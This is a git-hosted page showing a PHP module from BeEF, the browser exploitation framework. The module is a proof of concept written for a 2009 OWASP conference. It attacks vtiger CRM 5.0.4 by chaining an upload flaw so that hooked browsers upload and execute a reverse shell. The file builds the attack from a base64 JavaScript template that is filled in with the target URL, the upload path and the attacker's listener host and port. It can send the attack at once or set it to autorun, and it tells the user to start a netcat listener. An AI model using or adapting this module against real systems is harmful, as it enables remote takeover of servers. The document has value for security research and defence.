Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
03ffb4703d37555fc9723907e1ee052552391926
beef/modules/network/vtiger_crm_upload_exploit/index.php
wade@bindshell.net 03ffb4703d Initial Import 
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-01-11 00:54:08 +00:00

77 lines
2.3 KiB
PHP
Raw Blame History

<?
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
// Where did our file end up?
// Example /storage/2009/June/week3/<file>:
$year = date("Y");
$month = date("F");
$weekNum = date("W") - date("W",strtotime(date("Y-m-01"))) + 1;
$path = "/storage/$year/$month/week$weekNum/"
?>
<script>
var rtnval = "vtiger exploit sent";
function get_b64_code_vtiger() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "ATTACKURL", document.myform.vtiger_url.value);
b64code = b64replace(b64code, "FILEPATH", document.myform.vtiger_filepath.value);
b64code = b64replace(b64code, "CONNECTHOST", document.myform.vtiger_host.value);
b64code = b64replace(b64code, "CONNECTPORT", document.myform.vtiger_port.value);
b64code = b64replace(b64code, "RTN", rtnval);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Vtiger CRM Upload Exploit', get_b64_code_vtiger());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_vtiger());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Vtiger CRM Upload Exploit</div>
This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability
which is exploited is the in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a>.<br><br>
Start the listener on the host:
<pre>
nc -nvlp 8888
</pre>
<div id="module_subsection">
<form name="myform">
Target Web Server
<input type="text" name="vtiger_url" value="http://localhost/vtigercrm"/>
Target Directory
<input type="text" name="vtiger_filepath" value="<?php echo $path;?>"/>
Reverse Bindshell Host
<input type="text" name="vtiger_host" value="localhost"/>
Reverse Bindshell Port
<input type="text" name="vtiger_port" value="8888"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
Reference in New Issue View Git Blame Copy Permalink